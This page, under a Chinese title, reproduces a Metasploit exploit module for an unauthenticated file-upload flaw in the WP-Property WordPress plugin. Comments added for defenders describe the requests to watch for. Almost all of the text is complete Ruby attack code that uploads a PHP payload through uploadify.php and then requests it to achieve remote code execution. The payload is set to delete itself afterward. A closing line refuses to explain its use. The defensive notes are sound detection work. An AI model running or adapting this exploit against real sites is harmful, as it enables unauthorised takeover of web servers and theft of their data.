WordPress WP-Property PHP 文件上传漏洞

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'
# Metasploit remote exploit module for the unauthenticated file upload in the
# WP-Property WordPress plugin (the description below lists versions <= 1.35.0
# as affected).
#
# Reviewer notes for defenders, taken from the requests this module builds:
#   * every request goes to
#     wp-content/plugins/wp-property/third-party/uploadify/uploadify.php
#     under the WordPress base path, with no login step before it;
#   * the upload is a multipart POST with a "Filedata" part whose file name is
#     five random letters plus ".php", and a "folder" part naming the uploadify
#     directory;
#   * a GET for the path echoed in the upload response follows.
# Unauthenticated POSTs to that script, and new .php files appearing in that
# directory, are therefore the artefacts to alert on.
# NOTE(review): the fixed plugin version is not stated on this page; confirm it
# against the vendor advisory before treating a host as patched.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Registers the module metadata (name, references, payload constraints,
  # targets) and the single TARGETURI option.
  #
  # @param info [Hash] metadata passed in by the framework and merged through
  #   update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',
        'Description' => %q{
            This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
          plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
          temp directory without authentication, which results in arbitrary code execution.
        },
        'Author' => [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
        'Payload' => { 'BadChars' => "\x00" },
        'Platform' => 'php',
        'Arch' => ARCH_PHP,
        'Targets' => [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => 'Mar 26 2012'
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ],
      self.class
    )
  end

  # Probes for the uploadify.php script with a single GET.
  #
  # The only signal used is an HTTP 200 for the script path. The plugin version
  # is never read, so Appears means "the script is reachable", not "the host is
  # confirmed vulnerable"; a patched install that still serves the file would
  # be reported the same way.
  #
  # @return [Exploit::CheckCode::Unknown] when there is no response or the
  #   status is not 200
  # @return [Exploit::CheckCode::Appears] when the script answers with 200
  def check
    uri = target_uri.path
    uri << '/' unless uri.end_with?('/')

    probe = send_request_cgi({
      'method' => 'GET',
      'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    return Exploit::CheckCode::Unknown unless probe && probe.code == 200

    Exploit::CheckCode::Appears
  end

  # Uploads a PHP file through uploadify.php and then requests it.
  #
  # Sequence visible in this method: build a two-part multipart body
  # ("Filedata" carrying the payload, "folder" naming the uploadify directory),
  # POST it without any authentication step, require a 200 response whose body
  # contains the generated file name, then GET the path returned in that body.
  # Fails with UnexpectedReply when the upload response does not match.
  def exploit
    uri = target_uri.path
    uri << '/' unless uri.end_with?('/')

    peer = "#{rhost}:#{rport}"

    # File name is five random letters plus ".php", so it differs on every run.
    @payload_name = "#{rand_text_alpha(5)}.php"
    # NOTE(review): get_write_exec_payload comes from the PhpEXE mixin; the
    # :unlink_self option presumably makes the uploaded file delete itself, so
    # it may be gone by the time a responder looks for it - confirm in the mixin.
    php_code = get_write_exec_payload(:unlink_self => true)

    data = Rex::MIME::Message.new
    data.add_part(php_code, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    # Drops the CRLF that precedes a "--_Part_" boundary at the start of a line.
    request_body = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    upload = send_request_cgi({
      'method' => 'POST',
      'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype' => "multipart/form-data; boundary=#{data.bound}",
      'data' => request_body
    })

    # Success means a 200 whose body echoes the uploaded file name.
    accepted = upload && upload.code == 200 && upload.body =~ /#{@payload_name}/
    fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed") unless accepted

    # The response body is used verbatim as the path of the follow-up request.
    payload_uri = upload.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    send_request_raw({
      'uri' => payload_uri,
      'method' => 'GET'
    })
  end
end

不要问我这写的是什么 怎么利用 我是说msf.